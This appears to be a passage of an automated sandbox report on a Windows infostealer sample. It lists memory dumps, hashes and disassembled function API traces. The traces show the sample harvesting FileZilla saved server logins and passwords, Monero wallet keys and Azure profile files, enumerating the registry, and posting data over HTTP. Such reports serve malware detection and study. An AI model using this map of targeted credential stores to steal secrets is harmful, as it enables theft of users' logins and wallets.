                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ep=k
                                • API String ID: 0-3385147411
                                • Opcode ID: dc823356938f95aaf46c1a8deb66f40634f36b77dd04c947d78f15d5ac4d1cf7
                                • Instruction ID: 6036c80153d52caf4649eaf2fbfedb2097c1acddb3c2ff5ed139e01b3f8e7624
                                • Opcode Fuzzy Hash: dc823356938f95aaf46c1a8deb66f40634f36b77dd04c947d78f15d5ac4d1cf7
                                • Instruction Fuzzy Hash: 36612AF360C3049FE3046E2DECC577ABBD9EBA4310F19463DE685C3748E93999058692
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 278546dcdb03eb50b2524ad184c9862b3fbc6cb48845937b9b3dc51bf833be49
                                • Instruction ID: a91f95bf7d166180a83dab7791767ce1f36219c274c912fc596a70540e76e30d
                                • Opcode Fuzzy Hash: 278546dcdb03eb50b2524ad184c9862b3fbc6cb48845937b9b3dc51bf833be49
                                • Instruction Fuzzy Hash: 535128F3E092105BF7486E3DDD5837BBAD6DBD0720F2B823DA689877C8D93908058285
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 614101a8dcd7a36c6be9c403cd08fed5f996ee7e13d26a665fb81d4f77ce8f1d
                                • Instruction ID: 1fd5adb8e2dee3732e9ea1f608c5f0cd94f92eefcaf03fe7db6c989771431e5d
                                • Opcode Fuzzy Hash: 614101a8dcd7a36c6be9c403cd08fed5f996ee7e13d26a665fb81d4f77ce8f1d
                                • Instruction Fuzzy Hash: 54419BF3B582185BE704A57CEC95762B6CADB94320F19423DEF85D33C0FCB958058285
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ecb8ca2943c4226f9cb9456aadefcca5f45a74f9e365bb1a38ac8de7f6b6c700
                                • Instruction ID: 2fea086547a9ab8a7ab51ba63d61056e890da29538a201af0292e46e935c8d2f
                                • Opcode Fuzzy Hash: ecb8ca2943c4226f9cb9456aadefcca5f45a74f9e365bb1a38ac8de7f6b6c700
                                • Instruction Fuzzy Hash: BE3131B240C7089FE306BF59D88267AFBF4EF58321F06482DD6D082210EB319480DB87
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00EE0DBA,00EE0DB7,00EE0DB6,00EE0DB3), ref: 00ED0362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED0369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00ED0385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00ED03CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED03DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00ED0419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00ED0463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00ED0562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00ED0571
                                • lstrcat.KERNEL32(?,url: ), ref: 00ED0580
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED0593
                                • lstrcat.KERNEL32(?,00EE1678), ref: 00ED05A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED05B5
                                • lstrcat.KERNEL32(?,00EE167C), ref: 00ED05C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00ED05D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED05E6
                                • lstrcat.KERNEL32(?,00EE1688), ref: 00ED05F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00ED0604
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED0617
                                • lstrcat.KERNEL32(?,00EE1698), ref: 00ED0626
                                • lstrcat.KERNEL32(?,00EE169C), ref: 00ED0635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 3fa3f28776e782acf33dd230339cd682c26124488803bd0507367580920be696
                                • Instruction ID: 02c061a74510b86d4faac36d3c5463b9f56bcaf694b72e0e8db65149f1fa7bf5
                                • Opcode Fuzzy Hash: 3fa3f28776e782acf33dd230339cd682c26124488803bd0507367580920be696
                                • Instruction Fuzzy Hash: F9D14F76D002089BCB08EBF0DD9AEEE7778EF14300F44552AF512B7185EE74AA46DB61
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EC59F8
                                • StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00DAE9F0,00000000,?,00DAA710,00000000,?,00EE1A1C), ref: 00EC5E71
                                • lstrlen.KERNEL32(00000000), ref: 00EC5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC5E9A
                                • lstrlen.KERNEL32(00000000), ref: 00EC5EAF
                                • lstrlen.KERNEL32(00000000), ref: 00EC5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EC5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00EC5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EC5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EC5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FBD
                                • HttpOpenRequestA.WININET(00000000,00DAE920,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC5BF8
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 2285a4a0b42f267a1d5125d29dfe63d0e28a8d596441608804acdfedcf950d25
                                • Instruction ID: 48da386d90bbd3377daecb5f1cac019c1bad5171700c3700b3a18e4f18446830
                                • Opcode Fuzzy Hash: 2285a4a0b42f267a1d5125d29dfe63d0e28a8d596441608804acdfedcf950d25
                                • Instruction Fuzzy Hash: 11122176820118AACB19EBA0DC95FEE73B8FF54700F4451BAB50672191EF702B8ACF55
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00ECD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ECD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD208
                                • lstrcat.KERNEL32(?,00EE1478), ref: 00ECD217
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD22A
                                • lstrcat.KERNEL32(?,00EE147C), ref: 00ECD239
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD24C
                                • lstrcat.KERNEL32(?,00EE1480), ref: 00ECD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD26E
                                • lstrcat.KERNEL32(?,00EE1484), ref: 00ECD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD290
                                • lstrcat.KERNEL32(?,00EE1488), ref: 00ECD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD2B2
                                • lstrcat.KERNEL32(?,00EE148C), ref: 00ECD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD2D4
                                • lstrcat.KERNEL32(?,00EE1490), ref: 00ECD2E3
                                  • Part of subcall function 00EDA820: lstrlen.KERNEL32(00EC4F05,?,?,00EC4F05,00EE0DDE), ref: 00EDA82B
                                  • Part of subcall function 00EDA820: lstrcpy.KERNEL32(00EE0DDE,00000000), ref: 00EDA885
                                • lstrlen.KERNEL32(?), ref: 00ECD32A
                                • lstrlen.KERNEL32(?), ref: 00ECD339
                                  • Part of subcall function 00EDAA70: StrCmpCA.SHLWAPI(00DA8E18,00ECA7A7,?,00ECA7A7,00DA8E18), ref: 00EDAA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 152e1c01b0f41dfe311ac4bf627620f88737e439dd618e983b22abdfdd9c48c3
                                • Instruction ID: 73e0329fcdd1bedbb1a5f19a93e52eb95ac8aef7eb9efc7d532d90dabe743839
                                • Opcode Fuzzy Hash: 152e1c01b0f41dfe311ac4bf627620f88737e439dd618e983b22abdfdd9c48c3
                                • Instruction Fuzzy Hash: AEE171728102089BCB19EBA0ED96EEE73B8FF14301F04517AF516B3181DE75AB46CB61
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00DAD4F8,00000000,?,00EE144C,00000000,?,?), ref: 00ECCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00ECCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00ECCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ECCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00ECCAD9
                                • StrStrA.SHLWAPI(?,00DAD528,00EE0B52), ref: 00ECCAF7
                                • StrStrA.SHLWAPI(00000000,00DAD408), ref: 00ECCB1E
                                • StrStrA.SHLWAPI(?,00DAD7F0,00000000,?,00EE1458,00000000,?,00000000,00000000,?,00DA8FD8,00000000,?,00EE1454,00000000,?), ref: 00ECCCA2
                                • StrStrA.SHLWAPI(00000000,00DAD630), ref: 00ECCCB9
                                  • Part of subcall function 00ECC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ECC871
                                  • Part of subcall function 00ECC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ECC87C
                                • StrStrA.SHLWAPI(?,00DAD630,00000000,?,00EE145C,00000000,?,00000000,00DA8E88), ref: 00ECCD5A
                                • StrStrA.SHLWAPI(00000000,00DA90D8), ref: 00ECCD71
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B46), ref: 00ECC943
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B47), ref: 00ECC957
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B4E), ref: 00ECC978
                                • lstrlen.KERNEL32(00000000), ref: 00ECCE44
                                • CloseHandle.KERNEL32(00000000), ref: 00ECCE9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 416aa3591d160990ecbdffd814772923c859d46ec3733ec38fdfae25fc3a0ab7
                                • Instruction ID: ab53e3178c51fdbd50f3f73c2f1efd02d13d33ccec2fc07260769c142b01dc4b
                                • Opcode Fuzzy Hash: 416aa3591d160990ecbdffd814772923c859d46ec3733ec38fdfae25fc3a0ab7
                                • Instruction Fuzzy Hash: 62E10C76800148AACB19EBA0DC95FEE77B8EF54300F04516AF50673291DE706B87CB65
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • RegOpenKeyExA.ADVAPI32(00000000,00DAB3F8,00000000,00020019,00000000,00EE05B6), ref: 00ED83A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00ED8426
                                • wsprintfA.USER32 ref: 00ED8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00ED847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8499
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: e750ccd1c1aab1bb93e721dc1c5e55d744765a13c98ff12fe24093aa089ebaba
                                • Instruction ID: 5431431c43f89785cadc67b314f2dbcd9b8f9b1cf9b0500426d2e143c2dff626
                                • Opcode Fuzzy Hash: e750ccd1c1aab1bb93e721dc1c5e55d744765a13c98ff12fe24093aa089ebaba
                                • Instruction Fuzzy Hash: 26811E719102189BDB29DF50DD95FEA77B8FF48700F0092AAE509A6240DF716B86CF94
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00ED4DCD
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED492C
